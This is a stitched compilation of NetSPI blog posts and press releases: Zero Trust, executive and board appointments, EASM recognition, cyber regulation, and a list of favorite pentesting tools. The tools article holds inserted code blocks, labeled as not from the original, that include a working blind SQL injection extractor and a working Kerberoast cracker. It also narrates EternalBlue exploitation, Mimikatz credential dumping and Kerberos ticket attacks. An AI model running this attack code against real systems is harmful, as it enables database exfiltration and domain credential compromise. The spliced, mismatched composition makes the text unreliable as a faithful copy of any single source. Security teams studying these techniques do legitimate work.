– Rob LaMagna-Reiter, CISO at Hudl
While many misconceptions about Zero Trust exist, these three examples present nearly universal scenarios for any company aspiring to implement Zero Trust or continue its expansion. Zero Trust is a complex methodology, but internal teams can find support by partnering with technology vendors who specialize in cybersecurity.
Plan for Zero Trust Implementation Guidance Tailored to Your Business Goals
Zero Trust implementation uncovers what is normal and what isn’t for any business. This deep understanding allows for the creation of a strategy to guide the development of steps within Zero Trust, while remaining flexible to adapt to the business as it evolves.
Listen to the full interview on episode 46 of the Agent of Influence podcast where we expand on how to talk with internal stakeholders about Zero Trust in ways that resonate with them. If you’re ready to make progress on your Zero Trust implementation, contact NetSPI’s Strategic Advisory team to get started.
Post: 3 Misconceptions with Zero Trust Implementation (netspi.com, last modified 2023-05-18). Excerpt: Zero Trust implementation is different for every company, but these common misconceptions present universal scenarios most teams face.
Post published 2023-03-06 (netspi.com):
Seasoned cybersecurity and finance executives Vinay Anand and Jay Golonka will guide product and growth strategies for the offensive security leader.
Minneapolis, MN – NetSPI, the leader in offensive security, today announced two C-Suite leadership appointments, Chief Product Officer (CPO) Vinay Anand and Chief Financial Officer (CFO) Jay Golonka. They bring decades of experience supporting high-growth technology companies and will be instrumental in leading NetSPI’s technology growth.
"These appointments signal pivotal transformation for NetSPI, as we continue to evolve our technology platforms to meet the offensive security needs of the modern enterprise," said Aaron Shilts, CEO at NetSPI. "Vinay and Jay will play a key role in delivering the highest quality security solutions at-scale and maintaining profitable growth."
Anand is a seasoned technology leader, most recently supporting Palo Alto Networks’ Prisma Cloud as VP of Product. He will oversee NetSPI’s product strategy across the entire portfolio of offensive security solutions. This includes Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS), along with future, complementary technology investments. Over the last 20 years, he has led product strategy, engineering, marketing, and business development for a variety of security, software, and networking products. He has held leadership roles with Anthos, Google’s managed hybrid cloud platform, as well as IBM Security, McAfee, and Cisco Systems.
"The need to enable enterprise security professionals to accurately assess their risks in real time has never been more urgent and necessary," said Anand. "NetSPI is uniquely positioned to deliver on this mandate with their platform driven, human delivered methodology. I’m excited to join the team as their first Chief Product Officer to continue the momentum they’ve built bringing high-value, high-fidelity solutions to the industry."
Golonka brings over 25 years of experience leading high performing finance teams through periods of rapid growth. At NetSPI he will focus on scaling the team and providing actionable business insights across the organization. Previously, Golonka was the CFO at PE-backed software company Prometheus Group. During his time there, he led them through nine acquisitions. Jay spent 18 years in public accounting and had finance leadership positions at two other high-growth software companies before joining Prometheus Group. Over his career, he has worked with organizations as they navigate the public company environment, including organizations going through the formal IPO process.
"I was immediately aligned with NetSPI’s vision to expand the breadth and scale of their solutions," said Golonka. "They’ve experienced incredible growth by providing impactful solutions to real problems in the industry – and show no signs of stopping. I look forward to being a contributing part of the journey."
NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.
Veteran security industry executives appointed to support offensive security leader’s next stage of growth.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and offensive security, today announced the appointment of Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will help support the company’s next stage of growth following a year of record momentum.
“We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale.”
With over two decades of technology and security industry experience, Lundgren currently serves as the Chief Technology Officer at VMware Carbon Black. Having taken the journey with Carbon Black as a founding member, through IPO in 2018, and the VMware acquisition in 2019, he brings a long history of balancing technology requirements under the pressure of rapid business growth. Lundgren has a foundational understanding of offensive security, beginning his cybersecurity career penetration testing for the U.S. Air Force.
“Penetration testing is an area of security that benefits from the underlying expertise of the team and the rigor in which the work is performed and communicated,” said Lundgren. “NetSPI has built an incredible team of offensive security experts, with a hands-on, customer-first approach that stands out in the industry. I look forward to being part of NetSPI’s growth story.”
Spiliotis currently serves as a sales and go-to-market (GTM) advisor with NetSPI investor KKR. Prior to his advisory engagement with the global investment firm, he held several executive sales positions with high-growth technology companies, most recently serving as the Senior Vice President of Sales at Palo Alto Networks. Spiliotis also serves on the Board of Directors for ReliaQuest and is a GTM advisor for various other cybersecurity companies.
“Two years ago, I was introduced to NetSPI through KKR’s Next-Generation Technology growth portfolio. Immediately, they impressed me with their momentum, energy, and value proposition,” said Spiliotis. “NetSPI has the right ingredients to continue achieving massive success. I’m honored to join the Board, where I’ll continue to help NetSPI maximize its opportunity and support employee development in the sales organization alongside the leadership team and my partners at KKR.”
Post: NetSPI Appoints Scott Lundgren and John Spiliotis to its Board of Directors (netspi.com, last modified 2023-02-20). Excerpt: Carbon Black founding member and KKR advisor join the NetSPI Board of Directors to support the company’s next stage of growth.
Post published 2023-02-14 (netspi.com):
In this overview of 36 notable vendors, Forrester explores the benefits of External Attack Surface Management (EASM) and key functionalities to consider when selecting a partner.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management is recognized in The External Attack Surface Management Landscape, Q1 2023, authored by global research and advisory firm Forrester. The Landscape report aims to help organizations understand the value of EASM solutions and provides security professionals with an overview of notable vendors so they can select a solution based on their needs.
“The attack surface management market has seen incredible innovation and evolution. This report examines the benefits EASM brings to global enterprises – increased asset visibility, continuous pentesting, and better risk prioritization, to name a few,” said Jake Reynolds, Head of Emerging Technology at NetSPI. “We believe we play an important role in this market and are honored to be recognized by Forrester.”
In the report, Forrester defines EASM as “tools or functionalities that continually scan for, discover, and enumerate internet-facing assets, establish the unique fingerprints of discovered assets, and identify exposures on both known and unknown assets.” EASM vendors recognized alongside NetSPI all have varying features and use cases.
As mentioned in the research, NetSPI reports that its Attack Surface Management (ASM) solution is selected by clients for most or all of the use cases identified by Forrester. Forrester’s complete list of included use cases is:
Asset discovery
Asset inventory management
Vulnerability risk management
Cloud security posture management
Mergers and acquisitions (M&A) due diligence assistance
Supply chain/third-party risk management
Penetration testing
Governance, risk, and compliance (GRC)
Incident response and investigations
Breach and attack simulations (BAS)
Certificate management
NetSPI is listed as a managed service offering, with an industry focus in financial services, high-tech, and media. Visit www.netspi.com to schedule a demo of NetSPI’s ASM platform.
On February 2, NetSPI Managing Director Ron Kuriscak was featured in the SecurityWeek article Cyber Insights 2023 | Regulations. Read the preview below or view it online.
+++
SecurityWeek Cyber Insights 2023 | Regulations – In this world, nothing is certain but death, taxes, and cyber regulations. The first is static, the second goes up and down, but the third seems only to increase. The three primary drivers for cyber regulations are voter privacy, the economy, and national security – with the complication that the first is often in conflict with the second and third.
Transatlantic data flows
Privacy is the headline battleground going forward, and amply illustrates the conflict between voter demands and national economies. This can be seen in the unsettled but multi-year attempt to find a legal solution to the transfer of personal user data from Europe to the US. Economics demands it, but European law (GDPR) and swathes of European public opinion deny it.
At the time of writing, it is almost certainly illegal to transfer PII from Europe to the US. The Privacy Shield – the second attempt at finding a workaround to GDPR – was declared illegal in what is known as the Schrems II court ruling. The wording of that ruling almost certainly eliminates an alternative approach known as ‘standard contractual clauses’.
During 2022, the European Commission (EC) and the US Biden administration have worked on developing a replacement for Privacy Shield. The ball was obviously in the US court, and on October 7, 2022, Biden issued an Executive Order to implement the EU-US Data Privacy Framework agreement – sometimes known as Privacy Shield 2.0.
This was enthusiastically greeted by US business. IBM, for example, issued a statement, “These steps will restore certainty to the thousands of companies already self-certified under Privacy Shield. Providing predictable, free flows of data between the US and the EU will secure the mutual benefits of continued business cooperation and will create a foundation for future economic growth.”
Finally
Martin Zinaich, CISO at the City of Tampa, once suggested to SecurityWeek, “If it ain’t required, it ain’t gonna happen.” We may have reached the point, with better organized cybercriminals and more aggressive nation states, where it must happen and therefore must be required.
Ron Kuriscak, MD at NetSPI, certainly believes so. “Regulations need to become much more mature, stringent, and punitive. We must hold organizations more accountable for their inaction in the area of cybersecurity… Organizations will be held accountable for basic cybersecurity hygiene. If they are unable to meet the most basic standards a regulator will require a third party to take over cybersecurity program execution (they will be mandated to cover the associated costs). Similar to the FDA, we will start seeing industry-aligned compliance regulations with real penalties that will force real compliance and organizational change. The key will be enforcement and penalties.”
Type “pentesting” into GitHub, and you’ll find nearly 9,000 repository results.
Finding the right penetration testing tools can be a daunting task, given the sheer number of both open source and commercial options available. Using the right tool for the right objective – from capturing and manipulating HTTP traffic to finding SQL injection during web application pentests – can make a significant impact during assessments.
To help narrow your search parameters, we surveyed our team of 200+ global pentesters to identify the 12 must-have pentesting tools of the moment. Drumroll please…
Recognized as the industry standard in web application penetration testing, Burp Suite is primarily used to capture and manipulate HTTP traffic.
It combines a top-class proxy, a web vulnerability scanner, and an extensive ecosystem of extensions, making it invaluable for performing penetration tests. Burp Suite gives users fine-grained control to uncover and exploit vulnerabilities while also scanning for common web application flaws.
“I have used this tool nearly every day for over ten years. I have performed SQL Injections, server-side request forgeries, authentication/authorization bypasses, cross-site scripting, Java deserialization attacks, various code injections and remote code executions, and more.”
– Eric Gruber, Director, Attack Surface Management
“I use this tool for every pentest I do! For one test, I was able to intercept a file upload request and inject a malicious DTD to exploit server-side request forgery.”
– Karin Knapp, Security Consultant II
2. Nmap
Nmap (Network Mapper) is a popular pentesting tool used to discover hosts on a network and identify their open ports, exposed services, and, through its scripting engine, known vulnerabilities. It has been around for many years, amassing a great deal of community support, excellent documentation, and expansive functionality. NetSPI’s global pentesting team uses it extensively in Attack Surface Management.
“We use it all the time in Attack Surface Management to identify open ports on our clients' attack surfaces. This is the first step in exploiting a large majority of vulnerabilities.”
Behind the scenes, Resolve is also a penetration testing workbench for our services team and select clients that purchase a subscription.
From a workbench perspective, it’s a one-stop shop for NetSPI pentesting assessments: it houses checklists, allows our consultants to communicate with clients, stores documents, and is a central platform to document findings.
Resolve’s checklists and finding templates help our pentesters be more consistent with their documentation and help in organizing a methodical and thorough testing process, a key reason why our consultants nominated it as a top tool.
The platform saves hours, even days, by taking the output from tools and sorting and correlating the findings. In addition, it can track findings and detections over time, which has enabled NetSPI to build out a large vulnerability repository with thousands of instructions for validating findings.
“Resolve takes care of 95% of the reporting process for me, so I can spend more time actually helping the client and doing my job.”
- Cameron Geehr, Managing Consultant
“…Compared to other companies I have worked at, Resolve at least halves the amount of time spent reporting, allowing for more time to be spent performing testing.”
CrackMapExec is a versatile pentesting tool used to perform various post-exploitation techniques from a single user-interface. NetSPI pentesters have used this tool to execute pass-the-hash attacks, credential dumping, password spraying, and more – often resulting in administrative compromise.
“It is actively developed and is a framework that allows execution of multiple techniques and interaction with multiple common services.”
Browser Dev Tools are a built-in feature of all modern browsers intended to let developers debug their web applications, but they can also be leveraged by penetration testers. Their availability in browsers like Safari, Chrome, and Firefox makes them one of the most foundational and accessible means of application security testing.
Dev Tools let penetration testers view and manipulate all client-side scripts, cookies, and other web elements. They also come in handy when looking for hidden fields and other potentially sensitive data. Their ability to inspect and modify the contents of a given web page within the context of the browser makes them a great resource for anything from debugging to viewing network traffic when an intercepting proxy is not available.
“Some applications insecurely configure user permissions on the client-side. In cases like this, an attacker can modify client-side code to elevate their permissions in the application.”
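As an added illustration of the quoted pattern (not code from the original article or from any application NetSPI tested), the two handlers below show the vulnerable authorization decision beside its hardened form: the first trusts a role value the browser sends, which a user can change in Dev Tools before the request leaves the page; the second derives the role from the server-side session and ignores whatever the client claims. The session store, cookie values, and request shapes are constructed for the example.

```python
# Added example (not from the original article). SESSIONS stands in for the
# server-side session backend a web framework manages; the token values and
# users are constructed.
SESSIONS = {
    "c0ffee-alice": {"user": "alice", "role": "user"},
    "c0ffee-bob": {"user": "bob", "role": "admin"},
}


def delete_account_vulnerable(request):
    """Authorization decided by a role value the client sends.

    The role originated in client-side code (a JS variable or hidden form
    field), so anyone who edits the request in Dev Tools can send role=admin.
    """
    if request["body"].get("role") != "admin":
        return 403, "forbidden"
    return 200, f"deleted {request['body']['target']}"


def delete_account_hardened(request):
    """Authorization decided by the server-side session; the body is never consulted for it."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "authentication required"
    if session["role"] != "admin":
        return 403, "forbidden"
    return 200, f"deleted {request['body']['target']} by {session['user']}"


def tampered_request_from_alice():
    """What alice's browser sends after she changes the hidden role field to 'admin'."""
    return {"cookies": {"session": "c0ffee-alice"},
            "body": {"role": "admin", "target": "bob"}}


if __name__ == "__main__":
    request = tampered_request_from_alice()
    print("vulnerable:", delete_account_vulnerable(request))  # 200: alice deleted bob
    print("hardened:  ", delete_account_hardened(request))    # 403: session says alice is a user
```

The fix is not to hide the role field better or to obfuscate the JavaScript; anything that runs in the browser is under the user's control. Every authorization decision has to be made from state the server owns, and the client-side checks are kept only for user experience.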
The Metasploit exploitation framework provides all the functionality a pentester might need, including scanning networks and targets, launching exploits, receiving shells, and even performing post-exploitation. With its open-source nature and constantly evolving feature set, Metasploit is a top penetration testing tool because it allows testers to leverage exploits to demonstrate the full impact of security vulnerabilities.
NetSPI Security Consultant James Maguire used Metasploit to compromise a Windows domain and demonstrate to the client the risks of missing security patches and password reuse.
He shared, “Using Metasploit, I scanned the network for hosts missing the infamous MS17-010 (EternalBlue) patch.” He found three servers missing the patch, picked one, and launched the exploit using Metasploit. According to James, “The exploit was successful, and I got a Meterpreter shell. Meterpreter is a special attack payload available to Metasploit users and has several useful post-exploitation features and modules. I used one of my favorite modules (Mimikatz) to recover cleartext credentials from the victim server.” While reviewing the credentials, he discovered one of the accounts had domain admin privileges, and with that, he was able to deliver valuable penetration test results with ease.
“I was able to use Metasploit to compromise a windows domain and demonstrate the risks of missing security patches and password reuse to the client.”
SQLmap is an open-source project that tests for SQL injection vulnerabilities in web application requests. If found, it will also identify the type and location of the injection. It provides testers with an easy-to-use tool to interact with the vulnerability to enumerate data from the application's database.
SQLmap is a favorite among NetSPI’s consultants because SQL injection can be a very tedious finding to verify and determine its impact. SQLmap speeds up that process, thereby speeding up reporting.
NetSPI Security Consultant II Josiah Kohlmeyer explains, “When we find a SQL injection vulnerability, one of the ways to verify the finding is by enumerating the database version or database name. If the database name was ‘dev-database’, manually enumerating that requires us to hand-write SQL statements to brute-force determine each letter of the name one letter at a time.” With SQLmap, pentesters can pass the --current-db option and the tool completes that enumeration and returns the database name in 30-60 seconds instead of the 15-30 minutes it takes by hand.
“I've found SQL injection on several web application assessments, and I've always used SQLmap to verify the finding. Clients are always surprised to see I have information that should only be internally known.”
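The letter-by-letter enumeration Josiah describes is mechanical enough to script, and scripting it shows exactly what SQLmap automates. The following is an added example, not code from the original article or from SQLmap: a constructed, injectable endpoint backed by an in-memory SQLite database, and a boolean-based blind extractor that asks it one true/false question at a time. The table names, the db_name setting, and the value dev-database are made up for the example; SQLite has no server-side database name, so the secret lives in a config table, but the technique (break out of the string literal, append a condition, read the answer from whether the page shows a result) is the same one used against MySQL, MSSQL, or PostgreSQL.

```python
"""Added example (not from the original article or from sqlmap): boolean-based
blind SQL injection, extracting a value one character at a time from a
constructed vulnerable endpoint."""
import sqlite3


class VulnerableEndpoint:
    """Simulates a product search whose parameter is concatenated into SQL."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE products(id INTEGER, name TEXT);
            INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
            CREATE TABLE app_config(key TEXT, value TEXT);
            INSERT INTO app_config VALUES ('db_name', 'dev-database');
        """)  # constructed schema and data
        self.requests = 0

    def search(self, name):
        """True if the page would show a result ("found"), False otherwise."""
        self.requests += 1
        sql = f"SELECT id FROM products WHERE name = '{name}'"  # injectable: string concatenation
        return bool(self.db.execute(sql).fetchall())


# Stand-in for the database-name function a real DBMS exposes (constructed).
DB_NAME_QUERY = "SELECT value FROM app_config WHERE key = 'db_name'"


def blind_extract(oracle, subquery, max_len=64):
    """Recover the single-row result of `subquery` using only true/false answers."""
    length = None
    for n in range(1, max_len + 1):  # first learn how many characters to extract
        if oracle(f"widget' AND length(({subquery})) = {n} -- "):
            length = n
            break
    if length is None:
        raise ValueError("could not determine length: no true response")
    result = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII; binary search on the code point
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"widget' AND unicode(substr(({subquery}), {pos}, 1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    app = VulnerableEndpoint()
    print(blind_extract(app.search, DB_NAME_QUERY), "in", app.requests, "requests")
```

With a binary search over the printable ASCII range each character costs about seven requests rather than up to 95, which is the same optimization SQLmap applies; against a real target the oracle is an HTTP request whose response is classified as "found" or "not found" by status code, length, or a marker string. Parameterized queries remove the vulnerability entirely, because the input can no longer close the string literal.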
Known as the “C# toolset for raw Kerberos interaction and abuses,” Rubeus made the cut for its flexibility and power in Kerberos abuse.
Released in 2018, Rubeus allows for Kerberos interaction and abuse of Active Directory object misconfigurations. It can request valid Ticket Granting Tickets (TGTs) for accounts whose credentials or hashes an attacker holds, request Ticket Granting Service (TGS) tickets for accounts configured with a Service Principal Name (SPN), and inject those Kerberos tickets into a logon session or write them to a file for later use in authenticating to the domain.
NetSPI consultants have leveraged Rubeus to execute Kerberoasting, AS-REP roasting, pass-the-ticket, pass-the-hash (overpass-the-hash), golden ticket, silver ticket, and diamond ticket attacks.
“Rubeus implements almost all of the known Kerberos attacks and is extremely flexible in how it works. There is no ONE thing out there that could replace Rubeus if it was somehow removed from history.”
- Derek Wilson, Senior Security Consultant
“After guessing a weak user account password, I used Rubeus to request all domain user account hashes with a Service Principal Name configured with RC4 encryption. I sent the hashes to a password cracker and cracked a domain admin password.”
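The quote above is the whole Kerberoast chain: any authenticated domain user can request a service ticket for an SPN account, an RC4-encrypted ticket is encrypted under that account's NT hash, and the cracker only needs to try passwords until the ticket's checksum verifies. The following is an added example, not code from the original article or from Rubeus: it implements RC4-HMAC (etype 23) from RFC 4757 with its own MD4, builds a hash line in the $krb5tgs$23$ format that Rubeus emits and hashcat consumes, and recovers the service account password from a wordlist. The account name, realm, SPN, password, and ticket bytes are constructed for the example.

```python
"""Added example (not from the original article or from Rubeus): why RC4
service tickets crack offline. RC4-HMAC per RFC 4757; the MD4 is written out
because hashlib often lacks it on OpenSSL 3 builds."""
import hashlib
import hmac
import os
import struct

M32 = 0xFFFFFFFF


def md4(data):
    """MD4 (RFC 1320)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def rc4(key, data):
    """Plain RC4 stream cipher (key scheduling followed by keystream generation)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def ntlm_hash(password):
    """The RC4-HMAC Kerberos key is the account's NT hash: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def hmac_md5(key, data):
    return hmac.new(key, data, hashlib.md5).digest()


TICKET_USAGE = 2  # key usage number for the encrypted part of a Kerberos ticket


def rc4_hmac_encrypt(key, usage, plaintext, confounder=b""):
    """RFC 4757 encryption: checksum || RC4(K3, confounder || plaintext)."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def rc4_hmac_verify(key, usage, blob):
    """Decrypt with a candidate key and check the checksum: the cracker's inner loop."""
    checksum, edata = blob[:16], blob[16:]
    k1 = hmac_md5(key, struct.pack("<I", usage))
    k3 = hmac_md5(k1, checksum)
    return hmac.compare_digest(hmac_md5(k1, rc4(k3, edata)), checksum)


def make_kerberoast_hash(user, realm, spn, service_password, ticket_enc_part):
    """What a Kerberoast tool emits: the ticket's checksum and ciphertext, hex-encoded."""
    blob = rc4_hmac_encrypt(ntlm_hash(service_password), TICKET_USAGE, ticket_enc_part)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_kerberoast_hash(hash_line, wordlist):
    """Try each candidate; the first whose NT hash verifies the ticket checksum is the password."""
    _, checksum_hex, edata_hex = hash_line.rsplit("$", 2)
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_verify(ntlm_hash(candidate), TICKET_USAGE, blob):
            return candidate
    return None


if __name__ == "__main__":
    line = make_kerberoast_hash("svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433",
                                "Summer2023!", b"constructed ticket enc-part bytes")  # constructed
    print(line[:72] + "...")
    print(crack_kerberoast_hash(line, ["password", "Welcome1", "Summer2023!"]))
```

The defensive reading is the same as the offensive one: an account with an SPN and a guessable password is crackable by any authenticated user, so give SPN accounts long random passwords or use Group Managed Service Accounts, and restrict them to AES (msDS-SupportedEncryptionTypes) so RC4 tickets are not issued for them. AES tickets derive the key with PBKDF2 over 4096 iterations, so each guess costs orders of magnitude more than the single MD4 needed here.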
Developed by NetSPI's very own VP of Research Karl Fosaaen, MicroBurst is a PowerShell toolkit that allows for various attacks on Azure Services.
It houses all the attack automation scripts useful in Azure Cloud Pentesting and includes functions for anonymous enumeration, authenticated attacks, auditing configurations, and performing post-exploitation actions.
The information gathering tools are especially useful, and the password dumping function "Get-AzPasswords" has proven to be a crucial component of many successful exploitation campaigns to dump Key Vaults, Automation Accounts, and other credentials to escalate privileges in an Azure subscription.
In this webinar, Karl leverages Get-AzPasswords to automate the collection of passwords stored in Azure. Additionally, MicroBurst can also be used for Azure subdomain enumeration as seen in this demo by Day Johnson.
Bonus Tools: Visit our repository of NetSPI-developed open source tools.